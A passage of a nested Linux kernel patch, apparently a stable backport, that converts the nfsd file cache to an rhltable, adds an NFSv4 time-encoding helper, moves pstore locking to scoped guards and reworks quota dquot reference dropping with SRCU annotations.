++ * nfsd_file_dispose_list_delayed - move list of dead files to net's freeme list
++ * @dispose: list of nfsd_files to be disposed
++ *
++ * Transfers each file to the "freeme" list for its nfsd_net, to eventually
++ * be disposed of by the per-net garbage collector.
++ */
+ static void
+ nfsd_file_dispose_list_delayed(struct list_head *dispose)
+ {
+-	LIST_HEAD(list);
+-	struct nfsd_file *nf;
+-
+ 	while(!list_empty(dispose)) {
+-		nf = list_first_entry(dispose, struct nfsd_file, nf_lru);
+-		nfsd_file_list_add_pernet(&list, dispose, nf->nf_net);
+-		nfsd_file_list_add_disposal(&list, nf->nf_net);
++		struct nfsd_file *nf = list_first_entry(dispose,
++						struct nfsd_file, nf_lru);
++		struct nfsd_net *nn = net_generic(nf->nf_net, nfsd_net_id);
++		struct nfsd_fcache_disposal *l = nn->fcache_disposal;
++
++		spin_lock(&l->lock);
++		list_move_tail(&nf->nf_lru, &l->freeme);
++		spin_unlock(&l->lock);
++		queue_work(nfsd_filecache_wq, &l->work);
+ 	}
+ }
+ 
+@@ -678,8 +565,8 @@ nfsd_file_cond_queue(struct nfsd_file *nf, struct list_head *dispose)
+  * @inode:   inode on which to close out nfsd_files
+  * @dispose: list on which to gather nfsd_files to close out
+  *
+- * An nfsd_file represents a struct file being held open on behalf of nfsd. An
+- * open file however can block other activity (such as leases), or cause
++ * An nfsd_file represents a struct file being held open on behalf of nfsd.
++ * An open file however can block other activity (such as leases), or cause
+  * undesirable behavior (e.g. spurious silly-renames when reexporting NFS).
+  *
+  * This function is intended to find open nfsd_files when this sort of
+@@ -692,20 +579,17 @@ nfsd_file_cond_queue(struct nfsd_file *nf, struct list_head *dispose)
+ static void
+ nfsd_file_queue_for_close(struct inode *inode, struct list_head *dispose)
+ {
+-	struct nfsd_file_lookup_key key = {
+-		.type	= NFSD_FILE_KEY_INODE,
+-		.inode	= inode,
+-	};
++	struct rhlist_head *tmp, *list;
+ 	struct nfsd_file *nf;
+ 
+ 	rcu_read_lock();
+-	do {
+-		nf = rhashtable_lookup(&nfsd_file_rhash_tbl, &key,
+-				       nfsd_file_rhash_params);
+-		if (!nf)
+-			break;
++	list = rhltable_lookup(&nfsd_file_rhltable, &inode,
++			       nfsd_file_rhash_params);
++	rhl_for_each_entry_rcu(nf, tmp, list, nf_rlist) {
++		if (!test_bit(NFSD_FILE_GC, &nf->nf_flags))
++			continue;
+ 		nfsd_file_cond_queue(nf, dispose);
+-	} while (1);
++	}
+ 	rcu_read_unlock();
+ }
+ 
+@@ -758,8 +642,8 @@ nfsd_file_close_inode_sync(struct inode *inode)
+  * nfsd_file_delayed_close - close unused nfsd_files
+  * @work: dummy
+  *
+- * Walk the LRU list and destroy any entries that have not been used since
+- * the last scan.
++ * Scrape the freeme list for this nfsd_net, and then dispose of them
++ * all.
+  */
+ static void
+ nfsd_file_delayed_close(struct work_struct *work)
+@@ -768,7 +652,10 @@ nfsd_file_delayed_close(struct work_struct *work)
+ 	struct nfsd_fcache_disposal *l = container_of(work,
+ 			struct nfsd_fcache_disposal, work);
+ 
+-	nfsd_file_list_remove_disposal(&head, l);
++	spin_lock(&l->lock);
++	list_splice_init(&l->freeme, &head);
++	spin_unlock(&l->lock);
++
+ 	nfsd_file_dispose_list(&head);
+ }
+ 
+@@ -829,7 +716,7 @@ nfsd_file_cache_init(void)
+ 	if (test_and_set_bit(NFSD_FILE_CACHE_UP, &nfsd_file_flags) == 1)
+ 		return 0;
+ 
+-	ret = rhashtable_init(&nfsd_file_rhash_tbl, &nfsd_file_rhash_params);
++	ret = rhltable_init(&nfsd_file_rhltable, &nfsd_file_rhash_params);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -897,7 +784,7 @@ nfsd_file_cache_init(void)
+ 	nfsd_file_mark_slab = NULL;
+ 	destroy_workqueue(nfsd_filecache_wq);
+ 	nfsd_filecache_wq = NULL;
+-	rhashtable_destroy(&nfsd_file_rhash_tbl);
++	rhltable_destroy(&nfsd_file_rhltable);
+ 	goto out;
+ }
+ 
+@@ -906,7 +793,8 @@ nfsd_file_cache_init(void)
+  * @net: net-namespace to shut down the cache (may be NULL)
+  *
+  * Walk the nfsd_file cache and close out any that match @net. If @net is NULL,
+- * then close out everything. Called when an nfsd instance is being shut down.
++ * then close out everything. Called when an nfsd instance is being shut down,
++ * and when the exports table is flushed.
+  */
+ static void
+ __nfsd_file_cache_purge(struct net *net)
+@@ -915,7 +803,7 @@ __nfsd_file_cache_purge(struct net *net)
+ 	struct nfsd_file *nf;
+ 	LIST_HEAD(dispose);
+ 
+-	rhashtable_walk_enter(&nfsd_file_rhash_tbl, &iter);
++	rhltable_walk_enter(&nfsd_file_rhltable, &iter);
+ 	do {
+ 		rhashtable_walk_start(&iter);
+ 
+@@ -1021,7 +909,7 @@ nfsd_file_cache_shutdown(void)
+ 	nfsd_file_mark_slab = NULL;
+ 	destroy_workqueue(nfsd_filecache_wq);
+ 	nfsd_filecache_wq = NULL;
+-	rhashtable_destroy(&nfsd_file_rhash_tbl);
++	rhltable_destroy(&nfsd_file_rhltable);
+ 
+ 	for_each_possible_cpu(i) {
+ 		per_cpu(nfsd_file_cache_hits, i) = 0;
+@@ -1032,6 +920,35 @@ nfsd_file_cache_shutdown(void)
+ 	}
+ }
+ 
++static struct nfsd_file *
++nfsd_file_lookup_locked(const struct net *net, const struct cred *cred,
++			struct inode *inode, unsigned char need,
++			bool want_gc)
++{
++	struct rhlist_head *tmp, *list;
++	struct nfsd_file *nf;
++
++	list = rhltable_lookup(&nfsd_file_rhltable, &inode,
++			       nfsd_file_rhash_params);
++	rhl_for_each_entry_rcu(nf, tmp, list, nf_rlist) {
++		if (nf->nf_may != need)
++			continue;
++		if (nf->nf_net != net)
++			continue;
++		if (!nfsd_match_cred(nf->nf_cred, cred))
++			continue;
++		if (test_bit(NFSD_FILE_GC, &nf->nf_flags) != want_gc)
++			continue;
++		if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags) == 0)
++			continue;
++
++		if (!nfsd_file_get(nf))
++			continue;
++		return nf;
++	}
++	return NULL;
++}
++
+ /**
+  * nfsd_file_is_cached - are there any cached open files for this inode?
+  * @inode: inode to check
+@@ -1046,15 +963,20 @@ nfsd_file_cache_shutdown(void)
+ bool
+ nfsd_file_is_cached(struct inode *inode)
+ {
+-	struct nfsd_file_lookup_key key = {
+-		.type	= NFSD_FILE_KEY_INODE,
+-		.inode	= inode,
+-	};
++	struct rhlist_head *tmp, *list;
++	struct nfsd_file *nf;
+ 	bool ret = false;
+ 
+-	if (rhashtable_lookup_fast(&nfsd_file_rhash_tbl, &key,
+-				   nfsd_file_rhash_params) != NULL)
+-		ret = true;
++	rcu_read_lock();
++	list = rhltable_lookup(&nfsd_file_rhltable, &inode,
++			       nfsd_file_rhash_params);
++	rhl_for_each_entry_rcu(nf, tmp, list, nf_rlist)
++		if (test_bit(NFSD_FILE_GC, &nf->nf_flags)) {
++			ret = true;
++			break;
++		}
++	rcu_read_unlock();
++
+ 	trace_nfsd_file_is_cached(inode, (int)ret);
+ 	return ret;
+ }
+@@ -1064,14 +986,12 @@ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		     unsigned int may_flags, struct file *file,
+ 		     struct nfsd_file **pnf, bool want_gc)
+ {
+-	struct nfsd_file_lookup_key key = {
+-		.type	= NFSD_FILE_KEY_FULL,
+-		.need	= may_flags & NFSD_FILE_MAY_MASK,
+-		.net	= SVC_NET(rqstp),
+-		.gc	= want_gc,
+-	};
++	unsigned char need = may_flags & NFSD_FILE_MAY_MASK;
++	struct net *net = SVC_NET(rqstp);
++	struct nfsd_file *new, *nf;
++	const struct cred *cred;
+ 	bool open_retry = true;
+-	struct nfsd_file *nf;
++	struct inode *inode;
+ 	__be32 status;
+ 	int ret;
+ 
+@@ -1079,81 +999,88 @@ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 				may_flags|NFSD_MAY_OWNER_OVERRIDE);
+ 	if (status != nfs_ok)
+ 		return status;
+-	key.inode = d_inode(fhp->fh_dentry);
+-	key.cred = get_current_cred();
++	inode = d_inode(fhp->fh_dentry);
++	cred = get_current_cred();
+ 
+ retry:
+ 	rcu_read_lock();
+-	nf = rhashtable_lookup(&nfsd_file_rhash_tbl, &key,
+-			       nfsd_file_rhash_params);
+-	if (nf)
+-		nf = nfsd_file_get(nf);
++	nf = nfsd_file_lookup_locked(net, cred, inode, need, want_gc);
+ 	rcu_read_unlock();
+ 
+ 	if (nf) {
++		/*
++		 * If the nf is on the LRU then it holds an extra reference
++		 * that must be put if it's removed. It had better not be
++		 * the last one however, since we should hold another.
++		 */
+ 		if (nfsd_file_lru_remove(nf))
+ 			WARN_ON_ONCE(refcount_dec_and_test(&nf->nf_ref));
+ 		goto wait_for_construction;
+ 	}
+ 
+-	nf = nfsd_file_alloc(&key, may_flags);
+-	if (!nf) {
++	new = nfsd_file_alloc(net, inode, need, want_gc);
++	if (!new) {
+ 		status = nfserr_jukebox;
+-		goto out_status;
++		goto out;
+ 	}
+ 
+-	ret = rhashtable_lookup_insert_key(&nfsd_file_rhash_tbl,
+-					   &key, &nf->nf_rhash,
+-					   nfsd_file_rhash_params);
++	rcu_read_lock();
++	spin_lock(&inode->i_lock);
++	nf = nfsd_file_lookup_locked(net, cred, inode, need, want_gc);
++	if (unlikely(nf)) {
++		spin_unlock(&inode->i_lock);
++		rcu_read_unlock();
++		nfsd_file_slab_free(&new->nf_rcu);
++		goto wait_for_construction;
++	}
++	nf = new;
++	ret = rhltable_insert(&nfsd_file_rhltable, &nf->nf_rlist,
++			      nfsd_file_rhash_params);
++	spin_unlock(&inode->i_lock);
++	rcu_read_unlock();
+ 	if (likely(ret == 0))
+ 		goto open_file;
+ 
+-	nfsd_file_slab_free(&nf->nf_rcu);
+-	nf = NULL;
+ 	if (ret == -EEXIST)
+ 		goto retry;
+-	trace_nfsd_file_insert_err(rqstp, key.inode, may_flags, ret);
++	trace_nfsd_file_insert_err(rqstp, inode, may_flags, ret);
+ 	status = nfserr_jukebox;
+-	goto out_status;
++	goto construction_err;
+ 
+ wait_for_construction:
+ 	wait_on_bit(&nf->nf_flags, NFSD_FILE_PENDING, TASK_UNINTERRUPTIBLE);
+ 
+ 	/* Did construction of this file fail? */
+ 	if (!test_bit(NFSD_FILE_HASHED, &nf->nf_flags)) {
+-		trace_nfsd_file_cons_err(rqstp, key.inode, may_flags, nf);
++		trace_nfsd_file_cons_err(rqstp, inode, may_flags, nf);
+ 		if (!open_retry) {
+ 			status = nfserr_jukebox;
+-			goto out;
++			goto construction_err;
+ 		}
+ 		open_retry = false;
+-		if (refcount_dec_and_test(&nf->nf_ref))
+-			nfsd_file_free(nf);
+ 		goto retry;
+ 	}
+-
+ 	this_cpu_inc(nfsd_file_cache_hits);
+ 
+ 	status = nfserrno(nfsd_open_break_lease(file_inode(nf->nf_file), may_flags));
++	if (status != nfs_ok) {
++		nfsd_file_put(nf);
++		nf = NULL;
++	}
++
+ out:
+ 	if (status == nfs_ok) {
+ 		this_cpu_inc(nfsd_file_acquisitions);
+ 		nfsd_file_check_write_error(nf);
+ 		*pnf = nf;
+-	} else {
+-		if (refcount_dec_and_test(&nf->nf_ref))
+-			nfsd_file_free(nf);
+-		nf = NULL;
+ 	}
+-
+-out_status:
+-	put_cred(key.cred);
+-	trace_nfsd_file_acquire(rqstp, key.inode, may_flags, nf, status);
++	put_cred(cred);
++	trace_nfsd_file_acquire(rqstp, inode, may_flags, nf, status);
+ 	return status;
+ 
+ open_file:
+ 	trace_nfsd_file_alloc(nf);
+-	nf->nf_mark = nfsd_file_mark_find_or_create(nf, key.inode);
++	nf->nf_mark = nfsd_file_mark_find_or_create(nf, inode);
+ 	if (nf->nf_mark) {
+ 		if (file) {
+ 			get_file(file);
+@@ -1171,13 +1098,16 @@ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	 * If construction failed, or we raced with a call to unlink()
+ 	 * then unhash.
+ 	 */
+-	if (status == nfs_ok && key.inode->i_nlink == 0)
+-		status = nfserr_jukebox;
+-	if (status != nfs_ok)
++	if (status != nfs_ok || inode->i_nlink == 0)
+ 		nfsd_file_unhash(nf);
+-	clear_bit_unlock(NFSD_FILE_PENDING, &nf->nf_flags);
+-	smp_mb__after_atomic();
+-	wake_up_bit(&nf->nf_flags, NFSD_FILE_PENDING);
++	clear_and_wake_up_bit(NFSD_FILE_PENDING, &nf->nf_flags);
++	if (status == nfs_ok)
++		goto out;
++
++construction_err:
++	if (refcount_dec_and_test(&nf->nf_ref))
++		nfsd_file_free(nf);
++	nf = NULL;
+ 	goto out;
+ }
+ 
+@@ -1193,8 +1123,11 @@ nfsd_file_do_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+  * seconds after the final nfsd_file_put() in case the caller
+  * wants to re-use it.
+  *
+- * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+- * network byte order is returned.
++ * Return values:
++ *   %nfs_ok - @pnf points to an nfsd_file with its reference
++ *   count boosted.
++ *
++ * On error, an nfsstat value in network byte order is returned.
+  */
+ __be32
+ nfsd_file_acquire_gc(struct svc_rqst *rqstp, struct svc_fh *fhp,
+@@ -1214,8 +1147,11 @@ nfsd_file_acquire_gc(struct svc_rqst *rqstp, struct svc_fh *fhp,
+  * but not garbage-collected. The object is unhashed after the
+  * final nfsd_file_put().
+  *
+- * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+- * network byte order is returned.
++ * Return values:
++ *   %nfs_ok - @pnf points to an nfsd_file with its reference
++ *   count boosted.
++ *
++ * On error, an nfsstat value in network byte order is returned.
+  */
+ __be32
+ nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+@@ -1236,8 +1172,11 @@ nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+  * and @file is non-NULL, use it to instantiate a new nfsd_file instead of
+  * opening a new one.
+  *
+- * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+- * network byte order is returned.
++ * Return values:
++ *   %nfs_ok - @pnf points to an nfsd_file with its reference
++ *   count boosted.
++ *
++ * On error, an nfsstat value in network byte order is returned.
+  */
+ __be32
+ nfsd_file_acquire_opened(struct svc_rqst *rqstp, struct svc_fh *fhp,
+@@ -1268,7 +1207,7 @@ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ 		lru = list_lru_count(&nfsd_file_lru);
+ 
+ 		rcu_read_lock();
+-		ht = &nfsd_file_rhash_tbl;
++		ht = &nfsd_file_rhltable.ht;
+ 		count = atomic_read(&ht->nelems);
+ 		tbl = rht_dereference_rcu(ht->tbl, ht);
+ 		buckets = tbl->size;
+@@ -1284,7 +1223,7 @@ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ 		evictions += per_cpu(nfsd_file_evictions, i);
+ 	}
+ 
+-	seq_printf(m, "total entries: %u\n", count);
++	seq_printf(m, "total inodes:  %u\n", count);
+ 	seq_printf(m, "hash buckets:  %u\n", buckets);
+ 	seq_printf(m, "lru entries:   %lu\n", lru);
+ 	seq_printf(m, "cache hits:    %lu\n", hits);
+diff --git a/fs/nfsd/filecache.h b/fs/nfsd/filecache.h
+index 41516a4263ea5..e54165a3224f0 100644
+--- a/fs/nfsd/filecache.h
++++ b/fs/nfsd/filecache.h
+@@ -29,9 +29,8 @@ struct nfsd_file_mark {
+  * never be dereferenced, only used for comparison.
+  */
+ struct nfsd_file {
+-	struct rhash_head	nf_rhash;
+-	struct list_head	nf_lru;
+-	struct rcu_head		nf_rcu;
++	struct rhlist_head	nf_rlist;
++	void			*nf_inode;
+ 	struct file		*nf_file;
+ 	const struct cred	*nf_cred;
+ 	struct net		*nf_net;
+@@ -40,10 +39,12 @@ struct nfsd_file {
+ #define NFSD_FILE_REFERENCED	(2)
+ #define NFSD_FILE_GC		(3)
+ 	unsigned long		nf_flags;
+-	struct inode		*nf_inode;	/* don't deref */
+ 	refcount_t		nf_ref;
+ 	unsigned char		nf_may;
++
+ 	struct nfsd_file_mark	*nf_mark;
++	struct list_head	nf_lru;
++	struct rcu_head		nf_rcu;
+ 	ktime_t			nf_birthtime;
+ };
+ 
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index b9d694ec25d19..e4522e86e984e 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -602,9 +602,7 @@ put_nfs4_file(struct nfs4_file *fi)
+ static struct nfsd_file *
+ __nfs4_get_fd(struct nfs4_file *f, int oflag)
+ {
+-	if (f->fi_fds[oflag])
+-		return nfsd_file_get(f->fi_fds[oflag]);
+-	return NULL;
++	return nfsd_file_get(f->fi_fds[oflag]);
+ }
+ 
+ static struct nfsd_file *
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 597f14a80512f..4ed9fef14adc2 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -2541,6 +2541,20 @@ static __be32 *encode_change(__be32 *p, struct kstat *stat, struct inode *inode,
+ 	return p;
+ }
+ 
++static __be32 nfsd4_encode_nfstime4(struct xdr_stream *xdr,
++				    struct timespec64 *tv)
++{
++	__be32 *p;
++
++	p = xdr_reserve_space(xdr, XDR_UNIT * 3);
++	if (!p)
++		return nfserr_resource;
++
++	p = xdr_encode_hyper(p, (s64)tv->tv_sec);
++	*p = cpu_to_be32(tv->tv_nsec);
++	return nfs_ok;
++}
++
+ /*
+  * ctime (in NFSv4, time_metadata) is not writeable, and the client
+  * doesn't really care what resolution could theoretically be stored by
+@@ -3346,11 +3360,14 @@ nfsd4_encode_fattr(struct xdr_stream *xdr, struct svc_fh *fhp,
+ 		p = xdr_encode_hyper(p, dummy64);
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_TIME_ACCESS) {
+-		p = xdr_reserve_space(xdr, 12);
+-		if (!p)
+-			goto out_resource;
+-		p = xdr_encode_hyper(p, (s64)stat.atime.tv_sec);
+-		*p++ = cpu_to_be32(stat.atime.tv_nsec);
++		status = nfsd4_encode_nfstime4(xdr, &stat.atime);
++		if (status)
++			goto out;
++	}
++	if (bmval1 & FATTR4_WORD1_TIME_CREATE) {
++		status = nfsd4_encode_nfstime4(xdr, &stat.btime);
++		if (status)
++			goto out;
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_TIME_DELTA) {
+ 		p = xdr_reserve_space(xdr, 12);
+@@ -3359,25 +3376,14 @@ nfsd4_encode_fattr(struct xdr_stream *xdr, struct svc_fh *fhp,
+ 		p = encode_time_delta(p, d_inode(dentry));
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_TIME_METADATA) {
+-		p = xdr_reserve_space(xdr, 12);
+-		if (!p)
+-			goto out_resource;
+-		p = xdr_encode_hyper(p, (s64)stat.ctime.tv_sec);
+-		*p++ = cpu_to_be32(stat.ctime.tv_nsec);
++		status = nfsd4_encode_nfstime4(xdr, &stat.ctime);
++		if (status)
++			goto out;
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_TIME_MODIFY) {
+-		p = xdr_reserve_space(xdr, 12);
+-		if (!p)
+-			goto out_resource;
+-		p = xdr_encode_hyper(p, (s64)stat.mtime.tv_sec);
+-		*p++ = cpu_to_be32(stat.mtime.tv_nsec);
+-	}
+-	if (bmval1 & FATTR4_WORD1_TIME_CREATE) {
+-		p = xdr_reserve_space(xdr, 12);
+-		if (!p)
+-			goto out_resource;
+-		p = xdr_encode_hyper(p, (s64)stat.btime.tv_sec);
+-		*p++ = cpu_to_be32(stat.btime.tv_nsec);
++		status = nfsd4_encode_nfstime4(xdr, &stat.mtime);
++		if (status)
++			goto out;
+ 	}
+ 	if (bmval1 & FATTR4_WORD1_MOUNTED_ON_FILEID) {
+ 		u64 ino = stat.ino;
+diff --git a/fs/pstore/inode.c b/fs/pstore/inode.c
+index ffbadb8b3032d..ea3f104371d62 100644
+--- a/fs/pstore/inode.c
++++ b/fs/pstore/inode.c
+@@ -182,25 +182,21 @@ static int pstore_unlink(struct inode *dir, struct dentry *dentry)
+ {
+ 	struct pstore_private *p = d_inode(dentry)->i_private;
+ 	struct pstore_record *record = p->record;
+-	int rc = 0;
+ 
+ 	if (!record->psi->erase)
+ 		return -EPERM;
+ 
+ 	/* Make sure we can't race while removing this file. */
+-	mutex_lock(&records_list_lock);
+-	if (!list_empty(&p->list))
+-		list_del_init(&p->list);
+-	else
+-		rc = -ENOENT;
+-	p->dentry = NULL;
+-	mutex_unlock(&records_list_lock);
+-	if (rc)
+-		return rc;
+-
+-	mutex_lock(&record->psi->read_mutex);
+-	record->psi->erase(record);
+-	mutex_unlock(&record->psi->read_mutex);
++	scoped_guard(mutex, &records_list_lock) {
++		if (!list_empty(&p->list))
++			list_del_init(&p->list);
++		else
++			return -ENOENT;
++		p->dentry = NULL;
++	}
++
++	scoped_guard(mutex, &record->psi->read_mutex)
++		record->psi->erase(record);
+ 
+ 	return simple_unlink(dir, dentry);
+ }
+@@ -292,19 +288,16 @@ static struct dentry *psinfo_lock_root(void)
+ {
+ 	struct dentry *root;
+ 
+-	mutex_lock(&pstore_sb_lock);
++	guard(mutex)(&pstore_sb_lock);
+ 	/*
+ 	 * Having no backend is fine -- no records appear.
+ 	 * Not being mounted is fine -- nothing to do.
+ 	 */
+-	if (!psinfo || !pstore_sb) {
+-		mutex_unlock(&pstore_sb_lock);
++	if (!psinfo || !pstore_sb)
+ 		return NULL;
+-	}
+ 
+ 	root = pstore_sb->s_root;
+ 	inode_lock(d_inode(root));
+-	mutex_unlock(&pstore_sb_lock);
+ 
+ 	return root;
+ }
+@@ -313,29 +306,25 @@ int pstore_put_backend_records(struct pstore_info *psi)
+ {
+ 	struct pstore_private *pos, *tmp;
+ 	struct dentry *root;
+-	int rc = 0;
+ 
+ 	root = psinfo_lock_root();
+ 	if (!root)
+ 		return 0;
+ 
+-	mutex_lock(&records_list_lock);
+-	list_for_each_entry_safe(pos, tmp, &records_list, list) {
+-		if (pos->record->psi == psi) {
+-			list_del_init(&pos->list);
+-			rc = simple_unlink(d_inode(root), pos->dentry);
+-			if (WARN_ON(rc))
+-				break;
+-			d_drop(pos->dentry);
+-			dput(pos->dentry);
+-			pos->dentry = NULL;
++	scoped_guard(mutex, &records_list_lock) {
++		list_for_each_entry_safe(pos, tmp, &records_list, list) {
++			if (pos->record->psi == psi) {
++				list_del_init(&pos->list);
++				d_invalidate(pos->dentry);
++				simple_unlink(d_inode(root), pos->dentry);
++				pos->dentry = NULL;
++			}
+ 		}
+ 	}
+-	mutex_unlock(&records_list_lock);
+ 
+ 	inode_unlock(d_inode(root));
+ 
+-	return rc;
++	return 0;
+ }
+ 
+ /*
+@@ -355,20 +344,20 @@ int pstore_mkfile(struct dentry *root, struct pstore_record *record)
+ 	if (WARN_ON(!inode_is_locked(d_inode(root))))
+ 		return -EINVAL;
+ 
+-	rc = -EEXIST;
++	guard(mutex)(&records_list_lock);
++
+ 	/* Skip records that are already present in the filesystem. */
+-	mutex_lock(&records_list_lock);
+ 	list_for_each_entry(pos, &records_list, list) {
+ 		if (pos->record->type == record->type &&
+ 		    pos->record->id == record->id &&
+ 		    pos->record->psi == record->psi)
+-			goto fail;
++			return -EEXIST;
+ 	}
+ 
+ 	rc = -ENOMEM;
+ 	inode = pstore_get_inode(root->d_sb);
+ 	if (!inode)
+-		goto fail;
++		return -ENOMEM;
+ 	inode->i_mode = S_IFREG | 0444;
+ 	inode->i_fop = &pstore_file_operations;
+ 	scnprintf(name, sizeof(name), "%s-%s-%llu%s",
+@@ -395,7 +384,6 @@ int pstore_mkfile(struct dentry *root, struct pstore_record *record)
+ 	d_add(dentry, inode);
+ 
+ 	list_add(&private->list, &records_list);
+-	mutex_unlock(&records_list_lock);
+ 
+ 	return 0;
+ 
+@@ -403,8 +391,6 @@ int pstore_mkfile(struct dentry *root, struct pstore_record *record)
+ 	free_pstore_private(private);
+ fail_inode:
+ 	iput(inode);
+-fail:
+-	mutex_unlock(&records_list_lock);
+ 	return rc;
+ }
+ 
+@@ -450,9 +436,8 @@ static int pstore_fill_super(struct super_block *sb, void *data, int silent)
+ 	if (!sb->s_root)
+ 		return -ENOMEM;
+ 
+-	mutex_lock(&pstore_sb_lock);
+-	pstore_sb = sb;
+-	mutex_unlock(&pstore_sb_lock);
++	scoped_guard(mutex, &pstore_sb_lock)
++		pstore_sb = sb;
+ 
+ 	pstore_get_records(0);
+ 
+@@ -467,17 +452,14 @@ static struct dentry *pstore_mount(struct file_system_type *fs_type,
+ 
+ static void pstore_kill_sb(struct super_block *sb)
+ {
+-	mutex_lock(&pstore_sb_lock);
++	guard(mutex)(&pstore_sb_lock);
+ 	WARN_ON(pstore_sb && pstore_sb != sb);
+ 
+ 	kill_litter_super(sb);
+ 	pstore_sb = NULL;
+ 
+-	mutex_lock(&records_list_lock);
++	guard(mutex)(&records_list_lock);
+ 	INIT_LIST_HEAD(&records_list);
+-	mutex_unlock(&records_list_lock);
+-
+-	mutex_unlock(&pstore_sb_lock);
+ }
+ 
+ static struct file_system_type pstore_fs_type = {
+diff --git a/fs/quota/dquot.c b/fs/quota/dquot.c
+index b0cf3869d3bf5..b67557647d61f 100644
+--- a/fs/quota/dquot.c
++++ b/fs/quota/dquot.c
+@@ -399,15 +399,17 @@ int dquot_mark_dquot_dirty(struct dquot *dquot)
+ EXPORT_SYMBOL(dquot_mark_dquot_dirty);
+ 
+ /* Dirtify all the dquots - this can block when journalling */
+-static inline int mark_all_dquot_dirty(struct dquot * const *dquot)
++static inline int mark_all_dquot_dirty(struct dquot __rcu * const *dquots)
+ {
+ 	int ret, err, cnt;
++	struct dquot *dquot;
+ 
+ 	ret = err = 0;
+ 	for (cnt = 0; cnt < MAXQUOTAS; cnt++) {
+-		if (dquot[cnt])
++		dquot = srcu_dereference(dquots[cnt], &dquot_srcu);
++		if (dquot)
+ 			/* Even in case of error we have to continue */
+-			ret = mark_dquot_dirty(dquot[cnt]);
++			ret = mark_dquot_dirty(dquot);
+ 		if (!err)
+ 			err = ret;
+ 	}
+@@ -1004,14 +1006,15 @@ struct dquot *dqget(struct super_block *sb, struct kqid qid)
+ }
+ EXPORT_SYMBOL(dqget);
+ 
+-static inline struct dquot **i_dquot(struct inode *inode)
++static inline struct dquot __rcu **i_dquot(struct inode *inode)
+ {
+-	return inode->i_sb->s_op->get_dquots(inode);
++	/* Force __rcu for now until filesystems are fixed */
++	return (struct dquot __rcu **)inode->i_sb->s_op->get_dquots(inode);
+ }
+ 
+ static int dqinit_needed(struct inode *inode, int type)
+ {
+-	struct dquot * const *dquots;
++	struct dquot __rcu * const *dquots;
+ 	int cnt;
+ 
+ 	if (IS_NOQUOTA(inode))
+@@ -1084,59 +1087,7 @@ static int add_dquot_ref(struct super_block *sb, int type)
+ 	return err;
+ }
+ 
+-/*
+- * Remove references to dquots from inode and add dquot to list for freeing
+- * if we have the last reference to dquot
+- */
+-static void remove_inode_dquot_ref(struct inode *inode, int type,
+-				   struct list_head *tofree_head)
+-{
+-	struct dquot **dquots = i_dquot(inode);
+-	struct dquot *dquot = dquots[type];
+-
+-	if (!dquot)
+-		return;
+-
+-	dquots[type] = NULL;
+-	if (list_empty(&dquot->dq_free)) {
+-		/*
+-		 * The inode still has reference to dquot so it can't be in the
+-		 * free list
+-		 */
+-		spin_lock(&dq_list_lock);
+-		list_add(&dquot->dq_free, tofree_head);
+-		spin_unlock(&dq_list_lock);
+-	} else {
+-		/*
+-		 * Dquot is already in a list to put so we won't drop the last
+-		 * reference here.
+-		 */
+-		dqput(dquot);
+-	}
+-}
+-
+-/*
+- * Free list of dquots
+- * Dquots are removed from inodes and no new references can be got so we are
+- * the only ones holding reference
+- */
+-static void put_dquot_list(struct list_head *tofree_head)
+-{
+-	struct list_head *act_head;
+-	struct dquot *dquot;
+-
+-	act_head = tofree_head->next;
+-	while (act_head != tofree_head) {
+-		dquot = list_entry(act_head, struct dquot, dq_free);
+-		act_head = act_head->next;
+-		/* Remove dquot from the list so we won't have problems... */
+-		list_del_init(&dquot->dq_free);
+-		dqput(dquot);
+-	}
+-}
+-
+-static void remove_dquot_ref(struct super_block *sb, int type,
+-		struct list_head *tofree_head)
++static void remove_dquot_ref(struct super_block *sb, int type)
+ {
+ 	struct inode *inode;
+ #ifdef CONFIG_QUOTA_DEBUG
+@@ -1153,11 +1104,18 @@ static void remove_dquot_ref(struct super_block *sb, int type,
+ 		 */
+ 		spin_lock(&dq_data_lock);
+ 		if (!IS_NOQUOTA(inode)) {
++			struct dquot __rcu **dquots = i_dquot(inode);
++			struct dquot *dquot = srcu_dereference_check(
++				dquots[type], &dquot_srcu,
++				lockdep_is_held(&dq_data_lock));
++
+ #ifdef CONFIG_QUOTA_DEBUG
+ 			if (unlikely(inode_get_rsv_space(inode) > 0))
+ 				reserved = 1;
+ #endif
+-			remove_inode_dquot_ref(inode, type, tofree_head);
++			rcu_assign_pointer(dquots[type], NULL);
++			if (dquot)
++				dqput(dquot);
+ 		}
+ 		spin_unlock(&dq_data_lock);
+ 	}
+@@ -1174,13 +1132,8 @@ static void remove_dquot_ref(struct super_block *sb, int type,
+ /* Gather all references from inodes and drop them */
+ static void drop_dquot_ref(struct super_block *sb, int type)
+ {
+-	LIST_HEAD(tofree_head);
+-
+-	if (sb->dq_op) {
+-		remove_dquot_ref(sb, type, &tofree_head);
+-		synchronize_srcu(&dquot_srcu);
+-		put_dquot_list(&tofree_head);
+-	}
++	if (sb->dq_op)
++		remove_dquot_ref(sb, type);
+ }
+ 
+ static inline
+@@ -1513,7 +1466,8 @@ static int inode_quota_active(const struct inode *inode)
+ static int __dquot_initialize(struct inode *inode, int type)
+ {
+ 	int cnt, init_needed = 0;
